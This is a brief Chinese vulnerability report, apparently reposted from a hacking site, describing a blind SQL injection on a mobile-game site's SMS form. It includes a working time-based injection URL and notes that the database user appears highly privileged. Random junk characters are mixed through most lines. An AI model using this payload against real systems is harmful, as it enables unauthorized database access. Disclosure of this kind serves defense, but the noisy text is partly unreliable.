简要描述:
, ?2 {: X/ y( I# ]% W凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。# s# I" f! G& ~- F) P: z: M
& X) p T9 u: ^; ]
详细说明:0 j8 a( m8 S; k1 f
存在SQL盲注url:
* R- [1 d4 `7 ~' Kfenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1
2 O: I% [/ ^9 x# ohttp://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
$ Y7 ^* @& d; `3 @6 U! R nhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png8 j3 c5 ^5 U& f9 V1 \
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg
/ ~1 `/ ^8 ?% n, b5 n. X! p9 `2 e$ M8 U
能看到mysql系统数据库,看来user权限应该很高的。。 |